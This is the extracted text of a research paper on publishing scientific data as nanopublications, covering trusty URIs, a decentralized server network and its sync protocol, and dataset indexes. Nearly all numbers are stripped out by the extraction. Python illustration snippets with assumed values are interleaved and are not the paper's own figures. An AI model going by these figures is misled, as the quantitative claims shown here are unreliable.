this means that the publications describing scientific findings become disconnected from the data they are based on, which can seriously impair the how to cite this article kuhn et al. ( ), decentralized provenance-aware publishing with nanopublications. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:kuhntobias@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. verifiability and reproducibility of their results. addressing this issue raises a number of practical problems: how should one publish scientific datasets and how can one refer to them in the respective scientific publications? how can we be sure that the data will remain available in the future and how can we be sure that data we find on the web have not been corrupted or tampered with? moreover, how can we refer to specific entries or subsets from large datasets, for instance, to support a specific argument or hypothesis? to address some of these problems, a number of scientific data repositories have appeared, such as figshare and dryad (http://figshare.com, http://datadryad.org). furthermore, digital object identifiers (doi) have been advocated to be used not only for articles but also for scientific data (paskin, ). while these approaches certainly improve the situation of scientific data, in particular when combined with semantic web techniques, they have nevertheless a number of drawbacks: they have centralized architectures, they give us no possibility to check whether the data have been (deliberately or accidentally) modified, and they do not support access or referencing on a more granular level than entire datasets (such as individual data entries). we argue that the centralized nature of existing data repositories is inconsistent with the decentralized manner in which science is typically performed, and that it has serious consequences with respect to reliability and trust. the organizations running these platforms might at some point go bankrupt, be acquired by investors who do not feel committed to the principles of science, or for other reasons become unable to keep their websites up and running. even though the open licenses enforced by these data repositories will probably ensure that the datasets remain available at different places, there exist no standardized (i.e., automatable) procedures to find these alternative locations and to decide whether they are trustworthy or not. even if we put aside these worst-case scenarios, websites have typically not a perfect uptime and might be down for a few minutes or even hours every once in a while. this is certainly acceptable for most use cases involving a human user accessing data from these websites, but it can quickly become a problem in the case of automated access embedded in a larger service. furthermore, it is possible that somebody gains access to the repository’s database and silently modifies part of the data, or that the data get corrupted during the transfer from the server to the client. we can therefore never perfectly trust any data we get, which significantly complicates the work of scientists and impedes the potential of fully automatic analyses. lastly, existing forms of data publishing have for the most part only one level at which data is addressed and accessed: the level of entire datasets (sometimes split into a small number of tables). 
it is in these cases not possible to refer to individual data entries or subsets in a way that is standardized and retains the relevant metadata and provenance information. to illustrate this problem, let us assume that we conduct an analysis using, say, , individual data entries from each of three very large datasets (containing, say, millions of data entries each). how can we now refer to exactly these , entries to justify whatever conclusion we draw from them? the best thing we can currently do is to republish these , data entries as a new dataset and to refer to the large datasets as their origin. apart from the practical disadvantages of being forced to republish data just to refer to subsets of larger datasets, other scientists need to either (blindly) trust us or go through the tedious process of semi-automatically verifying that each of these entries kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://figshare.com http://datadryad.org http://dx.doi.org/ . /peerj-cs. indeed appears in one of the large datasets. instead of republishing the data, we could also try to describe the used subsets, e.g., in the form of sparql queries in the case of rdf data, but this doesn’t make it less tedious, keeping in mind that older versions of datasets are typically not provided by public apis such as sparql endpoints. below, we present an approach to tackle these problems, which builds upon existing semantic web technologies, in particular rdf and nanopublications, adheres to accepted web principles, such as decentralization and rest apis, and supports the fair guiding principles of making scientific data findable, accessible, interoperable, and reusable (wilkinson et al., ). specifically, our research question is: can we create a decentralized, reliable, and trustworthy system for publishing, retrieving, and archiving linked data in the form of sets of nanopublications based on existing web standards and infrastructure? it is important to note here that the word trustworthy has a broad meaning and there are different kinds of trust involved when it comes to retrieving and using datasets from some third party. when exploring existing datasets, a certain kind of trust is needed to decide whether an encountered dataset is appropriate for the given purpose. a different kind of trust is needed to decide whether an obtained file correctly represents a specific version of a specific dataset that has been chosen to be used. only the second kind of trust can be achieved with a technical solution alone, and we use the word trustworthy in this paper in this narrow technical sense covering the second kind of trust. this article is an extended and revised version of a previous conference paper (kuhn et al., ). these extensions include, most importantly, a new evaluation on the retrieval of nanopublication datasets over an unreliable connection, a description of the new feature of surface patterns, the specific protocol applied by existing servers, a server network that is now three times as large as before ( instead of five server instances), a much more detailed walk-through example, and five new figures. we furthermore present more details and discussions on topics including applications in the humanities, traversal-based querying, underspecified assertions, caching between architectural layers, and access of the server network via a web interface. 
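as a concrete illustration of the workaround mentioned above—describing a used subset by a query over a public endpoint instead of republishing the entries—one could record something like the following; the endpoint url, vocabulary, and query are entirely hypothetical:

```python
import requests

# hypothetical endpoint and query that select the subset of a large rdf dataset
# an analysis relied on, instead of republishing the entries themselves
ENDPOINT = "http://example.org/sparql"
QUERY = """
PREFIX ex: <http://example.org/vocab#>
SELECT ?entry WHERE {
  ?entry ex:partOf ex:LargeDataset ;
         ex:measuredValue ?v .
  FILTER(?v > 0.9)
}
"""

response = requests.get(
    ENDPOINT,
    params={"query": QUERY},
    headers={"Accept": "application/sparql-results+json"},
)
for binding in response.json()["results"]["bindings"]:
    print(binding["entry"]["value"])

# note: this only pins down the subset if the endpoint still serves exactly the same
# version of the dataset, which is precisely the problem discussed in this section
```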
background nanopublications (groth, gibson & velterop, ) are a relatively recent proposal for improving the efficiency of finding, connecting, and curating scientific findings in a manner that takes attribution, quality levels, and provenance into account. while narrative articles would still have their place in the academic landscape, small formal data snippets in the form of nanopublications should take their central position in scholarly communication (mons et al., ). most importantly, nanopublications can be automatically interpreted and aggregated and they allow for fine-grained citation metrics on the level of individual claims. a nanopublication is defined as a small data container consisting of three parts: an assertion part containing the main content in the form of an atomic piece of formally represented data (e.g., an observed effect of a drug on a disease); a provenance part that describes how this piece of data came about (e.g., how it was measured); and a publication info part that gives meta-information about the nanopublication as a whole kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (e.g., when it was created). the representation of a nanopublication with its three parts is based on the rdf language with named graphs (carroll et al., ). in other words, the nanopublication approach boils down to the ideas of subdividing scientific results into atomic assertions, representing these assertions in rdf, attaching provenance information in rdf on the level of individual assertions, and treating each of these tiny entities as an individual publication. nanopublications have been applied to a number of domains, so far mostly from the life sciences including pharmacology (williams et al., ; banda et al., ), genomics (patrinos et al., ), and proteomics (chichester et al., ). an increasing number of datasets formatted as nanopublications are openly available, including nextprot (chichester et al., ) and disgenet (queralt-rosinach et al., ), and the nanopublication concept has been combined with and integrated into existing frameworks for data discovery and integration, such as ckan (mccusker et al., ). interestingly, the concept of nanopublications has also been taken up in the humanities, namely in philosophy (http://emto-nanopub.referata.com/wiki/emto_nanopub), musi- cology (freedman, ), and history/archaeology (golden & shaw, ). a humanities dataset of facts is arguably more interpretive than a scientific dataset; relying, as it does, on the scholarly interpretation of primary sources. because of this condition, ‘‘facts’’ in human- ities datasets (such as prosopographies) have often been called ‘‘factoids’’ (bradley, ), as they have to account for a degree of uncertainty. nanopublications, with their support for granular context and provenance descriptions, offer a novel paradigm for publishing such factoids, by providing methods for representing metadata about responsibilities and by enabling discussions and revisions beyond any single humanities project. research objects are an approach related to nanopublications, aiming to establish ‘‘self-contained units of knowledge’’ (belhajjame et al., ), and they constitute in a sense the antipode approach to nanopublications. we could call them mega-publications, as they contain much more than a typical narrative publication, namely resources like input and output data, workflow definitions, log files, and presentation slides. 
we demonstrate in this paper, however, that bundling all resources of scientific studies in large packages is not a necessity to ensure the availability of the involved resources and their robust interlinking, but we can achieve that also with cryptographic identifiers and a decentralized architecture. sparql is an important and popular technology to access and publish linked data, and it is both a language to query rdf datasets (harris & seaborne, ) and a protocol to execute such queries on a remote server over http (feigenbaum et al., ). servers that provide the sparql protocol, referred to as ‘‘sparql endpoints,’’ are a technique for making linked data available on the web in a flexible manner. while off-the-shelf triple stores can nowadays handle billions of triples or more, they potentially require a significant amount of resources in the form of memory and processor time to execute queries, at least if the full expressive power of the sparql language is supported. a recent study found that more than half of the publicly accessible sparql endpoints are available less than % of the time (buil-aranda et al., ), posing a major problem to services depending on them, in particular to those that depend on several endpoints at the same time. to understand the consequences, imagine one has to program a mildly time-critical service that depends on rdf data from, say, ten different sparql endpoints. assuming that each kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://emto-nanopub.referata.com/wiki/emto_nanopub http://dx.doi.org/ . /peerj-cs. endpoint is available % of the time and their availabilities are independent from each other, this means at least one of them will be down during close to five months per year. the reasons for this problem are quite clear: sparql endpoints provide a very powerful query interface that causes heavy load in terms of memory and computing power on the side of the server. clients can request answers to very specific and complex queries they can freely define, all without paying a cent for the service. this contrasts with almost all other http interfaces, in which the server imposes (in comparison to sparql) a highly limited interface, where the computational costs per request are minimal. to solve these and other problems, more light-weight interfaces were suggested, such as the read-write linked data platform interface (speicher, arwe & malhotra, ), the triple pattern fragments interface (verborgh et al., ), as well as infrastructures to implement them, such as cumulusrdf (ladwig & harth, ). these interfaces deliberately allow less expressive requests, such that the maximal cost of each individual request can be bounded more strongly. more complex queries then need to be evaluated by clients, which decompose them in simpler subqueries that the interface supports (verborgh et al., ). while this constitutes a scalability improvement (at the cost of, for instance, slower queries), it does not necessarily lead to perfect uptimes, as servers can be down for other reasons than excessive workload. we propose here to go one step further by relying on a decentralized network and by supporting only identifier-based lookup of nanopublications. 
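the concrete availability percentage has been lost in this version of the text, but the arithmetic behind the "close to five months per year" statement can be checked with a few lines of python. assuming, purely for illustration, that each of ten independent endpoints is available 95% of the time:

# back-of-the-envelope check of the availability argument above;
# the per-endpoint availability of 95% is an assumed value for illustration
per_endpoint_availability = 0.95
n_endpoints = 10

# probability that all ten endpoints are up at a given moment
all_up = per_endpoint_availability ** n_endpoints

# expected fraction of time at least one endpoint is down,
# and the corresponding number of months per year
at_least_one_down = 1 - all_up
months_per_year = at_least_one_down * 12

print(f"all endpoints up: {all_up:.2%}")
print(f"at least one down: {at_least_one_down:.2%} of the time "
      f"(~{months_per_year:.1f} months per year)")

under these assumed numbers, at least one endpoint is down roughly 40% of the time, which indeed corresponds to close to five months per year.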
such limited interfaces normally have the drawback that traversal-based querying does not allow for the efficient and complete evaluation of certain types of queries (hartig, ), but this is not a problem with the multi-layer architecture we propose below, because querying is only performed at a higher level where these limitations do not apply. a well-known solution to the problem of individual servers being unreliable is the application of a decentralized architecture where the data is replicated on multiple servers. a number of such approaches related to data sharing have been proposed, for example in the form of distributed file systems based on cryptographic methods for data that are public (fu, kaashoek & mazières, ) or private (clarke et al., ). in contrast to the design principles of the semantic web, these approaches implement their own internet protocols and follow the hierarchical organization of file systems. other approaches build upon the existing bittorrent protocol and apply it to data publishing (markman & zavras, ; cohen & lo, ), and there is interesting work on repurposing the proof-of-work tasks of bitcoin for data preservation (miller et al., ). there exist furthermore a number of approaches to applying peer-to-peer networks to rdf data (filali et al., ), but they do not allow for the kind of permanent and provenance-aware publishing that we propose below. moreover, approaches that allow for robust and granular references to subsets of dynamic datasets (proell & rauber, ) exist only for the centralized and closed-world setting of database systems.

the approach that we present below is based on previous work, in which we proposed trusty uris to make nanopublications and their entire reference trees verifiable and immutable by the use of cryptographic hash values (kuhn & dumontier, ; kuhn & dumontier, ). this is an example of such a trusty uri:

http://example.org/r .ra abxdpz dcayxch l ei rubosil xdu rxbbbauo

the last characters of this uri (i.e., everything after ' .') are what we call the artifact code. it contains a hash value that is calculated on the rdf content it represents, such as the rdf graphs of a nanopublication. because this hash is part of the uri, any link to such an artifact comes with the possibility to verify its content, including other trusty uri links it might contain. in this way, the range of verifiability extends to the entire reference tree. generating these trusty uris does not come for free, in particular because the normalization of the content involves the sorting of the contained rdf statements. for small files such as nanopublications, however, the overhead is minimal, consisting only of about a millisecond per created nanopublication when the java library is used (kuhn & dumontier, ; kuhn & dumontier, ).

furthermore, we argued in previous work that the assertion of a nanopublication need not be fully formalized, but we can allow for informal or underspecified assertions (kuhn et al., ), to deal with the fact that the creation of accurate semantic representations can be too challenging or too time-consuming for many scenarios and types of users. this is particularly the case for domains that lack ontologies and standardized terminologies with sufficient coverage. these structured but informal statements are supposed to provide a middle ground for the situations where fully formal statements are not feasible.
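returning briefly to the trusty uris introduced above, the following python sketch illustrates the underlying principle of content-derived, verifiable identifiers: the statements are sorted, hashed, and the hash is embedded in the identifier, so that anyone holding the identifier can re-check the content. this is not the actual trusty uri algorithm (which is defined by a dedicated normalization procedure and a url-safe base64 alphabet, implemented in the nanopub-java library); it is only a minimal sketch of the idea.

import hashlib

def artifact_code(statements):
    # sketch only: sort the statements and hash their concatenation;
    # the real trusty uri module additionally replaces the
    # nanopublication's own uri with a placeholder and uses base64
    normalized = "\n".join(sorted(statements)) + "\n"
    return hashlib.sha256(normalized.encode("utf-8")).hexdigest()

def verify(uri, statements):
    # the identifier is verifiable: recompute the hash from the content
    # and compare it with the code embedded at the end of the uri
    return uri.rsplit(".", 1)[-1] == artifact_code(statements)

statements = [
    "<http://example.org/mosquito> <http://example.org/transmits> "
    "<http://example.org/malaria> <http://example.org/np#assertion> .",
]
uri = "http://example.org/np." + artifact_code(statements)
print(uri)
print(verify(uri, statements))                          # true
print(verify(uri, statements + ["<x> <y> <z> <g> ."]))  # false: content changed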
we proposed a controlled natural language (kuhn, ) for these informal statements, which we called aida (standing for the introduced restriction on english sentences to be atomic, independent, declarative, and absolute), and we had shown before that controlled natural language can also serve in the fully formalized case as a user-friendly syntax for representing scientific facts (kuhn et al., ). we also sketched how ''science bots'' could autonomously produce and publish nanopublications, and how algorithms could thereby be tightly linked to their generated data (kuhn, b), which requires the existence of a reliable and trustworthy publishing system, such as the one we present here.

approach
our approach on scientific data publishing builds upon the general linked data approach of lifting data on the web to linked rdf representations (berners-lee, ). we only deal here with structured data and assume that it is already present in an rdf representation. the question of how to arrive at such a representation from other formats has been addressed by countless approaches—for example sequeda, arenas & miranker ( ) and han et al. ( )—and is therefore outside of the scope of this paper. we furthermore exploit the fact that datasets in rdf can be split into small pieces without any effects on their semantics. after skolemization of blank nodes, rdf triples are independent and can be separated and joined without restrictions. best practices of how to define meaningful small groups of such triples still have to emerge, but an obvious and simple starting point is grouping them by the resource in subject position. we focus here on the technical questions and leave these practical issues for future research.

specifically, our approach rests upon the existing concept of nanopublications and our previously introduced method of trusty uris. it is a proposal of a reliable implementation of accepted semantic web principles, in particular of what has become known as the follow-your-nose principle: looking up a uri should return relevant data and links to other uris, which allows one (i.e., humans as well as machines) to discover things by navigating through this data space (berners-lee, ).

figure: illustration of current architectures of semantic web applications and our proposed approach.

we argue that approaches following this principle can only be reliable and efficient if we have some sort of guarantee that the resolution of any single identifier will succeed within a short time frame in one way or another, and that the processing of the received representation will only take up a small amount of time and resources. this requires that (1) rdf representations are made available on several distributed servers, so the chance that they all happen to be inaccessible at the same time is negligible, and that (2) these representations are reasonably small, so that downloading them is a matter of fractions of a second, and so that one has to process only a reasonable amount of data to decide which links to follow. we address the first requirement by proposing a distributed server network and the second one by building upon the concept of nanopublications. below we explain the general architecture, the functioning and the interaction of the nanopublication servers, and the concept of nanopublication indexes.
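as a small aside, the subject-based grouping mentioned in the approach above could look as follows. this python sketch splits a list of (already skolemized) triples into groups that could each become the assertion of one candidate nanopublication; the triples and prefixed names are made up for the example.

from collections import defaultdict

def split_by_subject(triples):
    # sketch of the simple splitting strategy mentioned above: after
    # skolemization, triples are independent, so we can group them by
    # subject and treat each group as one candidate assertion graph
    groups = defaultdict(list)
    for s, p, o in triples:
        groups[s].append((s, p, o))
    return dict(groups)

triples = [
    ("ex:gene1", "ex:isRelatedTo", "ex:malaria"),
    ("ex:gene1", "ex:locatedOn", "ex:chromosome9"),
    ("ex:gene2", "ex:isRelatedTo", "ex:malaria"),
]
for subject, group in split_by_subject(triples).items():
    print(subject, "->", len(group), "triple(s)")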
architecture there are currently at least three possible architectures for semantic web applications (and mixtures thereof), as shown in a simplified manner in fig. . the first option is the use of plain http get requests to dereference a uri. applying the follow-your-nose principle, resolvable uris provide the data based on which the application performs the tasks of finding relevant resources, running queries, analyzing and aggregating the results, and using them for the purpose of the application. this approach aligns very well with the principles and the architecture of the web, but the traversal-based querying it entails comes with limitations on efficiency and completeness (hartig, ). if sparql endpoints are used, as a second option, most of the workload is shifted from the application to the server via the expressive power of the sparql query language. as explained above, this puts kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. servers at risk of being overloaded. with a third option such as triple pattern fragments, servers provide only limited query features and clients perform the remainder of the query execution. this leads to reduced server costs, at the expense of longer query times. we can observe that all these current solutions are based on two-layer architectures, and have moreover no inherent replication mechanisms. a single point of failure can cause applications to be unable to complete their tasks: a single uri that does not resolve or a single server that does not respond can break the entire process. we argue here that we need distributed and decentralized services to allow for robust and reliable applications that consume linked data. in principle, this can be achieved for any of these two-layer architectures by simply setting up several identical servers that mirror the same content, but there is no standardized and generally accepted way of how to communicate these mirror servers and how to decide on the client side whether a supposed mirror server is trustworthy. even putting aside these difficulties, two-layer architectures have further conceptual limitations. the most low-level task of providing linked data is essential for all other tasks at higher levels, and therefore needs to be the most stable and robust one. we argue that this can be best achieved if we free this lowest layer from all tasks except the provision and archiving of data entries (nanopublications in our case) and decouple it from the tasks of providing services for finding, querying, or analyzing the data. this makes us advocate a multi-layer architecture, a possible realization of which is shown at the bottom of fig. . below we present a concrete proposal of such a low-level data provision infrastructure in the form of a nanopublication server network. based on such an infrastructure, one can then build different kinds of services operating on a subset of the nanopublications they find in the underlying network. ‘‘core services’’ could involve things like resolving backwards references (i.e., ‘‘which nanopublications refer to the given one?’’) and the retrieval of the nanopublications published by a given person or containing a particular uri. based on such core services for finding nanopublications, one could then provide ‘‘advanced services’’ that allow us to run queries on subsets of the data and ask for aggregated output. 
these higher layers can of course make use of existing techniques such as sparql endpoints and triple pattern fragments or even classical relational databases, and they can cache large portions of the data from the layers below (as nanopublications are immutable, they are easy to cache). for example, an advanced service could allow users to query the latest versions of several drug-related datasets, by keeping a local triple store and providing users with a sparql interface. such a service would regularly check for new data in the server network on the given topic, and replace outdated nanopublications in its triple store with new ones. a query request to this service, however, would not involve an immediate query to the underlying server network, in the same way that a query to the google search engine does not trigger a new crawl of the web. while the lowest layer would necessarily be accessible to everybody, some of the services on the higher level could be private or limited to a small (possibly paying) user group. we have in particular scientific data in mind, but we think that an architecture of this kind could also be used for semantic web content in general. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure schematic representation of the decentralized server architecture. nanopublications that have trusty uri identifiers can be uploaded to a server (or loaded from the local file system by the server ad- ministrator), and they are then distributed to the other servers of the network. they can then be retrieved from any of the servers, or from multiple servers simultaneously, even if the original server is not accessi- ble. nanopublication servers as a concrete proposal of a low-level data provision layer, as explained above, we present here a decentralized nanopublication server network with a rest api to provide and distribute nanopublications. to ensure the immutability of these nanopublications and to guarantee the reliability of the system, these nanopublications are required to come with trusty uri identifiers, i.e., they have to be transformed on the client side into such trusty nanopublications before they can be published to the network. the nanopublication servers of such a network connect to each other to retrieve and (partly) replicate their nanopublications, and they allow users to upload new nanopublications, which are then automatically distributed through the network. figure shows a schematic depiction of this server network. basing the content of this network on nanopublications with trusty uris has a number of positive consequences for its design: the first benefit is that the fact that nanopublications are always small (by definition) makes it easy to estimate how much time is needed to process an entity (such as validating its hash) and how much space to store it (e.g., as a serialized rdf string in a database). moreover it ensures that these processing times remain mostly in the fraction-of-a-second range, guaranteeing that responses are always quick, and that these entities are never too large to be analyzed in memory. the second benefit is that servers do not have to deal with identifier management, as the nanopublications already come with trusty uris, which are guaranteed to be unique and universal. the third and possibly most important benefit is that nanopublications with trusty uris are immutable and verifiable. 
this means that servers only have to deal with adding new entries but not with updating them, which eliminates the hard problems of concurrency control and data integrity in distributed systems. (as with classical publications, a nanopublication—once published to the network—cannot be deleted or ''unpublished,'' but only marked retracted or superseded by the publication of a new nanopublication.) together, these aspects significantly simplify the design of such a network and its synchronization protocol, and make it reliable and efficient even with limited resources.

specifically, a nanopublication server of the current network has the following components:

• a key-value store of its nanopublications (with the artifact code from the trusty uri as the key)
• a long list of all stored nanopublications, in the order they were loaded at the given server. we call this list the server's journal, and it consists of a journal identifier and the sequence of nanopublication identifiers, subdivided into pages of a fixed size ( , elements is the default: page containing the first , nanopublications; page the next , , etc.)
• a cache of gzipped packages containing all nanopublications for a given journal page
• pattern definitions in the form of a uri pattern and a hash pattern, which define the surface features of the nanopublications stored on the given server
• a list of known peers, i.e., the urls of other nanopublication servers
• information about each known peer, including the journal identifier and the total number of nanopublications at the time it was last visited.

the server network can be seen as an unstructured peer-to-peer network, where each node can freely decide which other nodes to connect to and which nanopublications to replicate. the uri pattern and the hash pattern of a server define the surface features of the nanopublications that this server cares about. we called them surface features because they can be determined by only looking at the uri of a nanopublication. for example, the uri pattern 'http://rdf.disgenet.org/' states that the given server is only interested in nanopublications whose uris start with the given sequence of characters. additionally, a server can declare a hash pattern like 'aa ab' to state that it is only interested in nanopublications whose hash in the trusty uri starts with one of the specified character sequences (separated by blank spaces). as hashes are represented in base notation, this particular hash pattern would let a server replicate about . % of all nanopublications. nanopublication servers are thereby given the opportunity to declare which subset of nanopublications they replicate, and need to connect only to those other servers whose subsets overlap. to decide on whether a nanopublication belongs to a specified subset or not, the server only has to apply string matching at two given starting points of the nanopublication uri (i.e., the first position and a fixed position from the end, as the hashes of the current version of trusty uris have a fixed length), which is computationally cheap.
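the surface-feature check described above amounts to two cheap string comparisons, which the following python sketch makes explicit. the pattern values and the assumed length of the artifact code are illustrative only, not the actual configuration of any server in the network.

def matches_surface_patterns(nanopub_uri, uri_pattern, hash_pattern,
                             artifact_code_length=45):
    # sketch of the server-side check: two string comparisons on the uri
    # alone, without fetching the content; artifact_code_length is an
    # assumed value used only for illustration
    if not nanopub_uri.startswith(uri_pattern):
        return False
    artifact_code = nanopub_uri[-artifact_code_length:]
    if not hash_pattern:            # empty pattern: accept every hash
        return True
    # a hash pattern is a space-separated list of allowed hash prefixes
    return any(artifact_code.startswith(p) for p in hash_pattern.split())

# hypothetical example values
uri = "http://rdf.disgenet.org/nanopub." + "aa" + "x" * 43
print(matches_surface_patterns(uri, "http://rdf.disgenet.org/", "aa ab"))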
based on the components introduced above, the servers respond to the following request (in the form of http get): • each server needs to return general server information, including the journal identifier and the number of stored nanopublications, the server’s uri pattern and hash pattern, whether the server accepts post requests for new nanopublications or servers (see below), and informative entries such as the name and email address of the maintainer and a general description. additionally, some server-specific limits can be specified: the maximum number of triples per nanopublication (the default is , ), the kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. source code repository: https://github. com/tkuhn/nanopub-server. maximum size of a nanopublication (the default is mb), and the maximum number of nanopublications to be stored on the given server (unlimited by default). • given an artifact code (i.e., the final part of a trusty uri) of a nanopublication that is stored by the server, it returns the given nanopublication in a format like trig, trix, n-quads, or json-ld (depending on content negotiation). • a journal page can be requested by page number as a list of trusty uris. • for every journal page (except for incomplete last pages), a gzipped package can be requested containing the respective nanopublications. • the list of known peers can be requested as a list of urls. in addition, a server can optionally support the following two actions (in the form of http post requests): • a server may accept requests to add a given individual nanopublication to its database. • a server may also accept requests to add the url of a new nanopublication server to its peer list. server administrators have the additional possibility to load nanopublications from the local file system, which can be used to publish large amounts of nanopublications, for which individual post requests are not feasible. together, the server components and their possible interactions outlined above allow for efficient decentralized distribution of published nanopublications. specifically, current nanopublication servers follow the following procedure. every server s keeps its own list of known peer ps. for each peer p on that list that has previously been visited, the server additionally keeps the number of nanopublications on that peer server n′p and its journal identifier j′p, as recorded during the last visit. at a regular interval, every peer server p on the list of known peers is visited by server s: . the latest server information is retrieved from p, which includes its list of known peers pp, the number of stored nanopublications np, the journal identifier jp, the server’s uri pattern up, and its hash pattern hp. . all entries in pp that are not yet on the visiting server’s own list of known peers ps are added to ps. . if the visiting server’s url is not in pp, the visiting server s makes itself known to server p with a post request (if this is supported by p). . if the subset defined by the server’s own uri/hash patterns us and hs does not overlap with the subset defined by up and hp, then there won’t be any nanopublications on the peer server that this server is interested in, and we jump to step . . the server will start at position n to look for new nanopublications at server p: n is set to the total number of nanopublications of the last visit n′p, or to if there was no last visit (nanopublication counting starts at ). . 
if the retrieved journal identifier jp is different from j′p (meaning that the server has been reset since the last visit), n is set to . . if n=np, meaning that there are no new nanopublications since the last visit, the server jumps to step . kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/tkuhn/nanopub-server https://github.com/tkuhn/nanopub-server https://peerj.com http://dx.doi.org/ . /peerj-cs. . all journal pages p starting from the one containing n until the end of the journal are downloaded one by one (considering the size of journal pages, which is by default , nanopublications): (a) all nanopublication identifiers in p (excluding those before n) are checked with respect to whether (a) they are covered by the visiting server’s patterns us and hs and (b) they are not already contained in the local store. a list l is created of all nanopublication identifiers of the given page that satisfy both, (a) and (b). (b) if the number of new nanopublications |l|exceeds a certain threshold (currently set to five), the nanopublications of p are downloaded as a gzipped package. otherwise, the new nanopublications (if any) are requested individually. (c) the retrieved nanopublications that are in list l are validated using their trusty uris, and all valid nanopublications are loaded to the server’s nanopublication store and their identifiers are added to the end of the server’s own journal. (invalid nanopublications are ignored.) . the journal identifier jp and the total number of nanopublications np for server p are remembered for the next visit, replacing the values of j′p and n ′ p. the current implementation is designed to be run on normal web servers alongside with other applications, with economic use of the server’s resources in terms of memory and processing time. in order to avoid overload of the server or the network connection, we restrict outgoing connections to other servers to one at a time. of course, sufficient storage space is needed to save the nanopublications (for which we currently use mongodb), but storage space is typically much easier and cheaper to scale up than memory or processing capacities. the current system and its protocol are not set in stone but, if successful, will have to evolve in the future—in particular with respect to network topology and partial replication—to accommodate a network of possibly thousands of servers and billions of nanopublications. nanopublication indexes to make the infrastructure described above practically useful, we have to introduce the concept of indexes. one of the core ideas behind nanopublications is that each of them is a tiny atomic piece of data. this implies that analyses will mostly involve more than just one nanopublication and typically a large number of them. similarly, most processes will generate more than just one nanopublication, possibly thousands or even millions of them. therefore, we need to be able to group nanopublications and to identify and use large collections of them. given the versatility of the nanopublication standard, it seems straightforward to represent such collections as nanopublications themselves. however, if we let such ‘‘col- lection nanopublications’’ contain other nanopublications, then the former would become very large for large collections and would quickly lose their property of being nano. 
we can solve part of that problem by applying a principle that we can call reference instead of containment: nanopublications cannot contain but only refer to other nanopublications, and trusty uris allow us to make these reference links almost as strong as containment links. to emphasize this principle, we call them indexes and not collections.

figure: schematic example of nanopublication indexes, which are themselves nanopublications. nanopublications can (but need not) be elements of one or more indexes. an index can have sub-indexes and can append to another index, in either case acquiring all nanopublications.

however, even by only containing references and not the complete nanopublications, these indexes can still become quite large. to ensure that all such index nanopublications remain nano in size, we need to put some limit on the number of references, and to support sets of arbitrary size, we can allow indexes to be appended by other indexes. we set , nanopublication references as the upper limit any single index can directly contain. this limit is admittedly arbitrary, but it seems to be a reasonable compromise between ensuring that nanopublications remain small on the one hand and limiting the number of nanopublications needed to define large indexes on the other. a set of , nanopublications, for example, can therefore be defined by a sequence of indexes, where the first one stands for the first , nanopublications, the second one appends to the first and adds another , nanopublications (thereby representing , of them), and so on up to the last index, which appends to the second to last and thereby stands for the entire set. in addition, to allow datasets to be organized in hierarchies, we define that the references of an index can also point to sub-indexes. in this way we end up with three types of relations: an index can append to another index, it can contain other indexes as sub-indexes, and it can contain nanopublications as elements. these relations defining the structure of nanopublication indexes are shown schematically in fig. . index (a) in the shown example contains five nanopublications, three of them via sub-index (c). the latter is also part of index (b), which additionally contains eight nanopublications via sub-index (f). two of these eight nanopublications belong directly to (f), whereas the remaining six come from appending to index (e). index (e) in turn gets half of its nanopublications by appending to index (d). we see that some nanopublications may not be referenced by any index at all, while others may belong to several indexes at the same time. the maximum number of direct nanopublications (or sub-indexes) is here set to three for illustration purposes, whereas in reality this limit is set to , . in addition to describing sets of data entries, nanopublication indexes can also have additional metadata attached, such as labels, descriptions, further references, and other types of relations at the level of an entire dataset. below we show how this general concept of indexes can be used to define sets of new or existing nanopublications, and how such index nanopublications can be generated and published, and their nanopublications retrieved.
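a quick back-of-the-envelope calculation shows how many chained index nanopublications are needed for datasets of various sizes. the limit of 1,000 direct references per index is used here as an assumed illustrative value, since the concrete figure is not reproduced in this version of the text.

import math

def indexes_needed(n_nanopubs, limit=1000):
    # assuming (for illustration) a limit of 1,000 direct references per
    # index: a chain of appending indexes is built, each adding up to
    # `limit` references, and the last index in the chain stands for the
    # whole set
    return max(1, math.ceil(n_nanopubs / limit))

for n in (5, 1000, 100_000, 10_000_000):
    print(f"{n:>10} nanopublications -> "
          f"{indexes_needed(n):>6} chained index nanopublications")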
as a side note, dataset metadata can be captured and announced as nanopublications even for datasets that are not (yet) themselves available in the nanopublication format. the hcls community profile of dataset descriptions (gray et al., ) provides a good guideline of which of the existing rdf vocabularies to use for such metadata descriptions.

trusty publishing
let us consider two simple exemplary scenarios to illustrate and motivate the general concepts. to demonstrate the procedure and the general interface of our implementation, we show here the individual steps on the command line in a tutorial-like fashion, using the np command from the nanopub-java library (kuhn, a). of course, users should eventually be supported by graphical interfaces, but command line tools are a good starting point for developers to build such tools. to make this example completely reproducible, these are the commands to download and compile the needed code from a bash shell (requiring git and maven):

$ git clone https://github.com/nanopublication/nanopub-java.git
$ cd nanopub-java
$ mvn package

and for convenience reasons, we can add the bin directory to the path variable:

$ path=$(pwd)/bin:$path

to publish some new data, they have to be formatted as nanopublications. we use the trig format here and define the following rdf prefixes:

@prefix : <http://example.org/np #>.
@prefix xsd: <http://www.w .org/ /xmlschema#>.
@prefix dc: <http://purl.org/dc/terms/>.
@prefix pav: <http://purl.org/pav/>.
@prefix prov: <http://www.w .org/ns/prov#>.
@prefix np: <http://www.nanopub.org/nschema#>.
@prefix ex: <http://example.org/>.

a nanopublication consists of three graphs plus the head graph. the latter defines the structure of the nanopublication by linking to the other graphs:

:head {
  : a np:nanopublication;
    np:hasassertion :assertion;
    np:hasprovenance :provenance;
    np:haspublicationinfo :pubinfo.
}

the actual claim or hypothesis of the nanopublication goes into the assertion graph:

:assertion {
  ex:mosquito ex:transmits ex:malaria.
}

